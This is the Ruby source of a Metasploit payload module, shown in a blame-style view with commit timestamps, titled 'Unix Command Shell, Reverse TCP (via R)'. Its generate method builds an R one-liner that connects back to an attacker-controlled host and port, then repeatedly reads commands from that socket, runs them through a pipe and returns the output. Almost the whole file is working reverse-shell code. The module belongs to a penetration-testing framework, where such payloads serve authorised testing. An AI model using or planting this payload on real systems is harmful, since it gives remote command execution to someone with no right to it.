2017-08-21 01:25:57 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core/payload/r'
|
|
|
|
require 'msf/core/handler/reverse_tcp'
|
|
|
|
require 'msf/base/sessions/command_shell'
|
|
|
|
require 'msf/base/sessions/command_shell_options'
|
|
|
|
|
|
|
|
module MetasploitModule
|
|
|
|
|
2017-08-28 10:30:30 +00:00
|
|
|
CachedSize = 157
|
2017-08-21 01:25:57 +00:00
|
|
|
|
|
|
|
include Msf::Payload::Single
|
|
|
|
include Msf::Payload::R
|
|
|
|
include Msf::Sessions::CommandShellOptions
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
|
|
|
'Name' => 'Unix Command Shell, Reverse TCP (via R)',
|
|
|
|
'Description' => 'Connect back and create a command shell via R',
|
|
|
|
'Author' => [ 'RageLtMan' ],
|
|
|
|
'License' => MSF_LICENSE,
|
2017-08-23 21:58:48 +00:00
|
|
|
'Platform' => 'unix',
|
|
|
|
'Arch' => ARCH_CMD,
|
2017-08-21 01:25:57 +00:00
|
|
|
'Handler' => Msf::Handler::ReverseTcp,
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
2017-08-23 21:58:48 +00:00
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
'RequiredCmd' => 'R',
|
2017-08-21 01:25:57 +00:00
|
|
|
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
def generate
|
|
|
|
return prepends(r_string)
|
|
|
|
end
|
|
|
|
|
|
|
|
def prepends(r_string)
|
|
|
|
return "R -e \"#{r_string}\""
|
2017-08-21 07:39:03 +00:00
|
|
|
end
|
2017-08-21 01:25:57 +00:00
|
|
|
|
|
|
|
def r_string
|
|
|
|
lhost = datastore['LHOST']
|
|
|
|
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
|
2017-08-21 21:16:03 +00:00
|
|
|
return "s<-socketConnection(host='#{lhost}',port=#{datastore['LPORT']}," +
|
2017-08-21 01:25:57 +00:00
|
|
|
"blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
|
|
|
|
"(pipe(readLines(s, 1))),s)}"
|
|
|
|
end
|
|
|
|
end
|